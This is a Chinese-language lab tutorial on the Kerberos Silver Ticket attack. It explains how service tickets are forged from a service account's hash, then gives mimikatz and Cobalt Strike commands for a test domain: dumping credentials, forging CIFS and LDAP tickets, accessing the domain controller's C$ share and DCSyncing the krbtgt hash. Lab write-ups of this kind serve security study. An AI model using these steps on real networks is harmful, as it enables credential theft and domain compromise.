服务账号介绍服务账号就是计算机名字$用来管理服务的账号白银票据原理如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第三部Client带着ST和Authenticator3向Server上的某个服务进行请求Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。我们以去动物举例实验内容实验环境windows server 2008域控192.168.113.142windows 10域内成员192.168.113.146实验前提1、已经控制了域控并且使用域管理员登录或者提权的system我们的目的是去访问win10 的机器条件如下1.域名2.域sid3.目标服务器名4.可利用的服务5.服务账号的NTMLHASH6.需要伪造的用户名实验步骤1、获取基本信息控制域控shellwhoami/user获取域的sid值(去掉最后的‐500500表示为administrator用户)shellnetconfigworkstation查看域SID: S-1-5-21-2071415428-1615975719-3128489008-500得到域为test.com SID:S-1-5-21-2071415428-1615975719-31284890082、获取服务账号的ntlm hash值mimikatzsekurlsa::logonpasswords得到 hash:3f8428c9c9a4f93bd0a3e44188a5d6b23、伪造票据CIFS共享服务(回到Win10机器)mimikatzkerberos::tgt查票mimikatzkerberos::purge清票shellklist查票shellklistpurge清票mimikatzkerberos::golden /domain:test.com /sid:S-1-5-21-2071415428-1615975719-3128489008 /target:dc.test.com /service:cifs /rc4:3f8428c9c9a4f93bd0a3e44188a5d6b2 /user:abcd /ptt由于这个CS太卡了我用机器直接演示4、访问域控shelldir\\dc.test.com\c$5、伪造票据LDAP共享服务mimikatzkerberos::tgt查票mimikatzkerberos::purge清票shellklist查票shellklistpurge清票mimikatzkerberos::golden/domain:test.com/sid:S-1-5-21-2071415428-1615975719-3128489008/target:dc.test.com/service:LDAP/rc4:3f8428c9c9a4f93bd0a3e44188a5d6b2/user:abcd/ptt6、查询域控的krgtgtmimikatzlsadump::dcsync/dc:dc.test.com/domain:test.com/user:krbtgtf34dfe188b7c064387f2e03373f9edbf由此就可以和黄金票据联动就算该用户改了密码也可以用用黄金票据做白银票据反过来亦可